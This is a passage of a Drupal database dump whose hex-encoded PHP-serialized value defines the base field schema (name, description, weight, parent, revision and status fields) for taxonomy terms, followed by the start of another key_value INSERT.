31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a63726561746564223b733a383a2273657474696e6773223b613a303a7b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3138393b7d733a373a22002a0074797065223b733a373a2263726561746564223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a313a7b733a343a2274797065223b733a333a22696e74223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31333a227265766973696f6e5f75736572223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a225265766973696f6e2075736572223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35303a225468652075736572204944206f662074686520617574686f72206f66207468652063757272656e74207265766973696f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227265766973696f6e61626c65223b623a313b733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a31333a227265766973696f6e5f75736572223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a32373a226669656c645f6974656d3a656e746974795f7265666572656e6365223b733a383a2273657474696e6773223b613a333a7b733a31313a227461726765745f74797065223b733a343a2275736572223b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3231393b7d733a373a22002a0074797065223b733a31363a22656e746974795f7265666572656e6365223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a393a227461726765745f6964223b613a333a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a393a227461726765745f6964223b613a313a7b693a303b733a393a227461726765745f6964223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a32303a227265766973696f6e5f6c6f675f6d657373616765223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a31303a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32303a225265766973696f6e206c6f67206d657373616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34333a2242726965666c7920646573637269626520746865206368616e67657320796f752068617665206d6164652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227265766973696f6e61626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b733a303a22223b7d7d733a373a22646973706c6179223b613a313a7b733a343a22666f726d223b613a313a7b733a373a226f7074696f6e73223b613a313a7b733a363a22726567696f6e223b733a363a2268696464656e223b7d7d7d733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a32303a227265766973696f6e5f6c6f675f6d657373616765223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a32323a226669656c645f6974656d3a737472696e675f6c6f6e67223b733a383a2273657474696e6773223b613a313a7b733a31343a22636173655f73656e736974697665223b623a303b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3235363b7d733a373a22002a0074797065223b733a31313a22737472696e675f6c6f6e67223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a363a22737461747573223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a31303a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a393a225075626c6973686564223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227265766973696f6e61626c65223b623a313b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b623a313b7d7d733a373a22646973706c6179223b613a313a7b733a343a22666f726d223b613a323a7b733a373a226f7074696f6e73223b613a333a7b733a343a2274797065223b733a31363a22626f6f6c65616e5f636865636b626f78223b733a383a2273657474696e6773223b613a313a7b733a31333a22646973706c61795f6c6162656c223b623a313b7d733a363a22776569676874223b693a3130303b7d733a31323a22636f6e666967757261626c65223b623a313b7d7d733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a363a22737461747573223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a333a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a626f6f6c65616e223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a323a224f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a226f66665f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a333a224f6666223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d7d733a353a22636c617373223b733a32323a2244727570616c5c757365725c5374617475734974656d223b7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3239353b7d733a373a22002a0074797065223b733a373a22626f6f6c65616e223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a343a226e616d65223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a31303a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a224e616d65223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227472616e736c617461626c65223b623a313b733a31323a227265766973696f6e61626c65223b623a313b733a383a227265717569726564223b623a313b733a373a22646973706c6179223b613a323a7b733a343a2276696577223b613a313a7b733a373a226f7074696f6e73223b613a333a7b733a353a226c6162656c223b733a363a2268696464656e223b733a343a2274797065223b733a363a22737472696e67223b733a363a22776569676874223b693a2d353b7d7d733a343a22666f726d223b613a323a7b733a373a226f7074696f6e73223b613a323a7b733a343a2274797065223b733a31363a22737472696e675f746578746669656c64223b733a363a22776569676874223b693a2d353b7d733a31323a22636f6e666967757261626c65223b623a313b7d7d733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a343a226e616d65223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31373a226669656c645f6974656d3a737472696e67223b733a383a2273657474696e6773223b613a333a7b733a31303a226d61785f6c656e677468223b693a3235353b733a383a2269735f6173636969223b623a303b733a31343a22636173655f73656e736974697665223b623a303b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3334333b7d733a373a22002a0074797065223b733a363a22737472696e67223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a393a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a224465736372697074696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227472616e736c617461626c65223b623a313b733a31323a227265766973696f6e61626c65223b623a313b733a373a22646973706c6179223b613a323a7b733a343a2276696577223b613a323a7b733a373a226f7074696f6e73223b613a333a7b733a353a226c6162656c223b733a363a2268696464656e223b733a343a2274797065223b733a31323a22746578745f64656661756c74223b733a363a22776569676874223b693a303b7d733a31323a22636f6e666967757261626c65223b623a313b7d733a343a22666f726d223b613a323a7b733a373a226f7074696f6e73223b613a323a7b733a343a2274797065223b733a31343a22746578745f746578746669656c64223b733a363a22776569676874223b693a303b7d733a31323a22636f6e666967757261626c65223b623a313b7d7d733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a31313a226465736372697074696f6e223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a32303a226669656c645f6974656d3a746578745f6c6f6e67223b733a383a2273657474696e6773223b613a303a7b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3338373b7d733a373a22002a0074797065223b733a393a22746578745f6c6f6e67223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a323a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b7d733a363a22666f726d6174223b613a323a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b7d7d733a373a22696e6465786573223b613a313a7b733a363a22666f726d6174223b613a313a7b693a303b733a363a22666f726d6174223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a363a22776569676874223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a22576569676874223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35313a2254686520776569676874206f662074686973207465726d20696e2072656c6174696f6e20746f206f74686572207465726d732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a303b7d7d733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a363a22776569676874223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a696e7465676572223b733a383a2273657474696e6773223b613a363a7b733a383a22756e7369676e6564223b623a303b733a343a2273697a65223b733a363a226e6f726d616c223b733a333a226d696e223b733a303a22223b733a333a226d6178223b733a303a22223b733a363a22707265666978223b733a303a22223b733a363a22737566666978223b733a303a22223b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3433323b7d733a373a22002a0074797065223b733a373a22696e7465676572223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a303b733a343a2273697a65223b733a363a226e6f726d616c223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a363a22706172656e74223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a373a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a225465726d20506172656e7473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32353a2254686520706172656e7473206f662074686973207465726d2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a2263617264696e616c697479223b693a2d313b733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a363a22706172656e74223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a32373a226669656c645f6974656d3a656e746974795f7265666572656e6365223b733a383a2273657474696e6773223b613a333a7b733a31313a227461726765745f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3437323b7d733a373a22002a0074797065223b733a31363a22656e746974795f7265666572656e6365223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a393a227461726765745f6964223b613a333a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a393a227461726765745f6964223b613a313a7b693a303b733a393a227461726765745f6964223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a373a226368616e676564223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a393a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a224368616e676564223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33393a225468652074696d65207468617420746865207465726d20776173206c617374206564697465642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227472616e736c617461626c65223b623a313b733a31323a227265766973696f6e61626c65223b623a313b733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a373a226368616e676564223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a6368616e676564223b733a383a2273657474696e6773223b613a303a7b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3530383b7d733a373a22002a0074797065223b733a373a226368616e676564223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a313a7b733a343a2274797065223b733a333a22696e74223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31363a2264656661756c745f6c616e67636f6465223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a31303a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a2244656661756c74207472616e736c6174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35383a224120666c616720696e6469636174696e6720776865746865722074686973206973207468652064656661756c74207472616e736c6174696f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227472616e736c617461626c65223b623a313b733a31323a227265766973696f6e61626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b623a313b7d7d733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a31363a2264656661756c745f6c616e67636f6465223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a626f6f6c65616e223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a323a224f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a226f66665f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a333a224f6666223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3533393b7d733a373a22002a0074797065223b733a373a22626f6f6c65616e223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31363a227265766973696f6e5f64656661756c74223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a31313a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a2244656661756c74207265766973696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a37323a224120666c616720696e6469636174696e67207768657468657220746869732077617320612064656661756c74207265766973696f6e207768656e206974207761732073617665642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31363a2273746f726167655f7265717569726564223b623a313b733a383a22696e7465726e616c223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31323a227265766973696f6e61626c65223b623a313b733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a31363a227265766973696f6e5f64656661756c74223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a626f6f6c65616e223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a323a224f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a226f66665f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a333a224f6666223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3538323b7d733a373a22002a0074797065223b733a373a22626f6f6c65616e223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a31303a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32393a225265766973696f6e207472616e736c6174696f6e206166666563746564223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a37323a22496e6469636174657320696620746865206c6173742065646974206f662061207472616e736c6174696f6e2062656c6f6e677320746f2063757272656e74207265766973696f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a31323a227265766973696f6e61626c65223b623a313b733a31323a227472616e736c617461626c65223b623a313b733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a626f6f6c65616e223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a323a224f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a226f66665f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a333a224f6666223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3632343b7d733a373a22002a0074797065223b733a373a22626f6f6c65616e223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
